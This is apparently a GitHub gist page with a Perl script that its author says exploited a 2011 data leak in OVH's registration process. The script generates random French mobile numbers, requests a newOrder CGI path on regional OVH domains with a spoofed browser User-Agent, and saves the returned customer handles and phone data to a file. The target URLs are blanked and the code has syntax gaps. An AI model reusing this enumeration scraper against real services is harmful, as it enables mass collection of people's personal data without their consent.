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Last active December 20, 2015 06:29
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  • Save DamienChiboub/6085725 to your computer and use it in GitHub Desktop.
Save DamienChiboub/6085725 to your computer and use it in GitHub Desktop.
It's a Perl script created to exploit a #dataleak from ovh hoster. I was able to get Ovh.Users( Nic-Handles & GsmNumbers). Weakness was on this script : reached by the register process. can be launched, but it's now returning errors. It's also creating ovh-data.txt & ovh-d…
#-- Found in 2011 --
#-- Ovh DataViewer Perl Script --
#-- This Script Show the dataleak of the Ovh Register Process --
#-- Start
#-- Step 1 Generate Random GSM number --
#-- Step 2 Generate Random Target Selection by listed servers --
#-- Step 3 Request the Generated Target/GSM --
#-- Step 4 Store Result on ovh-data.txt or Issue on ovh-dbg.txt --
#-- End
#-- Posted @
#!/usr/bin/perl -W
use LWP;
use Switch;
#Step 1
#gsm random generation
my $a = int(rand(9));
my $b = int(rand(9));
my $c = int(rand(9));
my $d = int(rand(9));
my $e = int(rand(9));
my $f = int(rand(9));
my $g = int(rand(9));
my $h = int(rand(9));
my $gsmprinted = "06.$a$b.$c$d.$e$f.$g$h";
my $gsm = "$a$b$c$d$e$f$g$h";
#Step 2
#target random generation
my $rand = int(rand(14));
switch ($rand) {
case 0 { $url = "" }
case 1 { $url = "" }
case 2 { $url = "" }
case 3 { $url = "" }
case 4 { $url = "" }
case 5 { $url = "" }
case 6 { $url = "" }
case 7 { $url = "" }
case 8 { $url = "" }
case 9 { $url = "" }
case 10 { $url = "" }
case 11 { $url = "" }
case 12 { $url = "" }
case 13 { $url = "" }
case 14 { $url = "" }
else { print "previous case not true" }
print "\n";
print "----------------------------------------------------------------------- \n";
print "------------ Randomize Ovh TopLevelDomain Selector ----------- \n";
print "\n";
print ".fi .de .es .fr .com .com/ca .com/us .pl .it .pl .nl .cz .ie .lt \n";
print "\n";
print "----------------------------------------------------------------------- \n";
print "\n";
print "Fqdn => $url \n";
print "\n";
print "Gsm => $gsmprinted \n";
my $addr = "$url/cgi-bin/newOrder/$gsm) \n";
print "Request $addr \n";
print "\n";
print "----------------------------------------------------------------------- \n";
my $browser = new LWP::UserAgent;
#Step 3
my $request = new HTTP::Request( GET => "$addr" );
my $headers = $request->headers();
$headers->header( 'User-Agent','Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.2 (like Gecko)');
$headers->header('Referer', '/');
my $response = $browser->request($request);
#Step 4
if ($response->is_success){
my $headers = $response->headers();
open (Data, ">>ovh-data.txt") || die "Open ovh-data.txt issue : $!";
print Data "06$gsm ";
print Data "".$response->content. "";
print Data " $addr \n";
close Data || die "Close ovh-data.txt issue : $!";
print "Downloaded \n";
} else {
my $headers = $response->headers();
open (Debug, ">>ovh-dbg.txt") || die "Open ovh-dbg.txt issue : $!";
print Debug "06$gsm ";
print Debug "".$response->status_line. "";
print Debug " $addr \n";
close Debug || die "Close ovh-dbg.txt issue : $!";
print "Bad Request \n";
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